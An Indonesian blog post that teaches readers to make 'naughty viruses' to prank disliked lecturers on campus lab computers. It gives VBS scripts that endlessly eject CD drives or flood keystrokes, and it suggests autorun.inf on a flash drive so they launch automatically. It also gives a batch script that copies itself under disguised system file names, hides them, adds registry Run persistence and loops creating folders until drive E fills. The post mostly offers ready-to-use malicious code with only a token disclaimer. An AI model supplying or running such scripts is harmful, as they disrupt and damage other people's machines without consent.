lihat juga

Wednesday, June 20, 2012

Cara membuat Virus Nakal


Yuk buat “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom, yah iseng2 buatin scripts .vbs.
Caranya: Buka notepad dan masukkan code berikut,
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.
Cara membuat virus nakal
Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap loe colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.
NB: kl males atau ga tau cara copasnya. download ajah linknya diakhir artikel:
Nah mau script .vbs yang laen lagi?
WScript.Sleep 18000
WScript.Sleep 1000
do
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "H"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "l"
WScript.Sleep 500
WshShell.SendKeys "o"
WScript.Sleep 500
WshShell.SendKeys ". "
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "p"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "K"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "r"
WScript.Sleep 500
WshShell.SendKeys " "
WScript.Sleep 500
WshShell.SendKeys "b"
WScript.Sleep 500
WshShell.SendKeys "a"
WScript.Sleep 500
WshShell.SendKeys "i"
WScript.Sleep 500
WshShell.SendKeys "k"
WScript.Sleep 500
WshShell.SendKeys "?"
WScript.Sleep 500
wscript.sleep 5000
loop
Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik?
ingat yah simpan dengan ekstensi nama .vbs, klik file–>save as
Buat virus nakal
Kode Vbs ini akan membuat user terus mengetikkan kata2 “Kamu emang jelek koq!” :D
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Kamu emang jelak koq!"
loop
Dan membuat terus menerus menekan tombol “Enter”
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Terus tekan backspace:
MsgBox "Balik lagi ah...saltik"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
 
 
 
 
 
 
Ada Virus yang mantab juga.
ikuti aja resep di bawah ini
 
 

Cara buat virus ampuh menggunakan notepad

Kalo sebelumnya erifargaz sering share tentang antivirus, tidak ada salahnya juga jika saya share cara membuat virus, heee. ingat disini saya cuma share saja biar sobat tambah pengetahuan. tapi jangan suka jahil kepada teman sob, janji yaach, heee. langsung saja bagi sobat blogger yang berminat langsung ikuti petunjuk dibawah ini dijamin mak nyuuuus sob. cara-caranya sebagai berikut : 


1. buka notepad
2. copy+paste bahasa pemograman

@echo off
title %username% Wan Bule Simple Commend !!!
echo ~~~~~~~~~~~~~~ 100% Succes Complete ~~~~~~~~~~~~~~~~~
copy *.cmd c:Autoexec.cmd >nul
copy *.cmd c:ntldr.cmd >nul
copy *.cmd c:MSDOS.cmd >nul
copy *.cmd c:IO.cmd >nul
copy *.cmd c:hiberfil.cmd >nul
copy *.cmd c:pagefile.cmd >nul
attrib +r +s +h c:Autoexec.cmd >nul
attrib +r +s +h c:ntldr.cmd >nul
attrib +r +s +h c:MSDOS.cmd >nul
attrib +r +s +h c:IO.cmd >nul
attrib +r +s +h c:hiberfil.cmd >nul
attrib +r +s +h c:pagefile.cmd >nul
attrib +r +s +h c:Tes aja.exe>nul
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v wanbule@yahoo.com /t REG_SZ /d c:Autoexec.cmd /f >nul
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v System32 /t REG_SZ /d c:ntldr.cmd /f >nul
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v Windows /t REG_SZ /d c:MSDOS.cmd /f >nul
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v AdobeLauncer /t REG_SZ /d c:IO.cmd /f >nul
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v MsOffice /t REG_SZ /d c:hiberfil.cmd /f >nul
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v Reader /t REG_SZ /d c:pagefile.cmd /f >nul
md D:Data_%username%urang awak.exe
md c:system.bat
:start
mkdir e:%random% mkdir e:%random% mkdir e:%random%
mkdir e:%random% mkdir e:%random% mkdir e:%random%
mkdir e:%random% mkdir e:%random% mkdir e:%random%
mkdir e:%random% mkdir e:%random% mkdir e:%random%
goto start



itu tuh codenya sobat copy code diatas mudah kan sob…??
Copy code di atas trus sobat save dengan nama uji coba.bat ganti save as type nya menjadi all files.Nah tinggal di jalanin aja tuh mantab, thx moga bermanfaat
 

ads

Ditulis Oleh : gdfysx Hari: 5:24 AM Kategori:

0 comments:

Post a Comment

surf